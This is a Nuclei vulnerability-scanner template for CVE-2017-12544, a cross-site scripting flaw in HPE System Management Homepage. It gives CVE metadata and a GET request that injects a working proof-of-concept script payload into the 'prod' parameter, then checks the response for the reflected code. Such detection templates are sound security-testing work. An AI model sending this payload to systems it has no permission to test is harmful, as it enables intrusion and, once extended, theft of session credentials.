nuclei-templates/http/cves/2017/CVE-2017-12544.yaml

47 lines
1.5 KiB
YAML

id: CVE-2017-12544
info:
name: HPE System Management - Cross-Site Scripting
author: divya_mudgal
severity: medium
description: HPE System Management contains a cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
reference:
- https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbmu03753en_us
- http://web.archive.org/web/20211206092413/https://securitytracker.com/id/1039437
- https://nvd.nist.gov/vuln/detail/CVE-2017-12544
- http://www.securitytracker.com/id/1039437
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2017-12544
cwe-id: CWE-79
epss-score: 0.96723
cpe: cpe:2.3:a:hp:system_management_homepage:*:*:*:*:*:*:*:*
epss-percentile: 0.99503
metadata:
max-request: 1
vendor: hp
product: system_management_homepage
tags: cve,cve2017,xss,hp
http:
- method: GET
path:
- "{{BaseURL}}/gsearch.php.en?prod=';prompt`document.domain`;//"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "var prodName = '';prompt`document.domain`;//';"
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200